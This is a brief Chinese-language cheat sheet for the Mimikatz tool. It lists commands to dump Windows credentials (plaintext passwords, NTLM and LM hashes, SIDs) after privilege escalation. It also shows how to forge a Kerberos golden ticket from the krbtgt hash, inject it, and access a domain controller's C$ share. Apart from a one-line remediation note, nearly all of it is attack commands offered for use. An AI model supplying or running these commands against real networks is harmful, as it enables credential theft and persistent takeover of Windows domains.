Mimikatz
下載地址
https://github.com/gentilkiwi/mimikatz/releases
本地憑據破解
以管理員身份運行(拿到shell提權后)
mimikatz#privilege::debug "測試是否OK,正確的返回應該是Privilege '20' OK"
mimikatz#sekurlsa::logonpasswords "獲取本機用戶名、口令、SID、LM-HASH、NTLM-HASH"
mimikatz#lsadump::lsa /patch "查看相關信息"
黃金憑據生成
#kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:test.kirbi
備注
- user-sid(在lsadump::lsa /patch中獲取到的數據);
- ntlmhash-value(在lsadump::lsa /patch中獲取到的數據);
- krbtgt是域控配置域后自動生成的一個賬戶;
利用黃金票據
導入票據: mimikatz:
kerberos::ptt test.kirbi
登陸域控:
net use \\xxxxx.TEST.LOCAL
dir \\xxxxx.TEST.LOCA\c$
黃金憑據的修復方案
修改兩次krbtgt的賬號口令
其他的一些操作
獲取進程信息process::list(還可以imports、exports、start、stop、run、resume、suspend等操作);
獲取服務信息service::list(還可以start、stop、remove等操作);
sekurlsa::wdigest-----獲取本地用戶信息及密碼
sekurlsa::tspkg------獲取tspkg用戶信息及密碼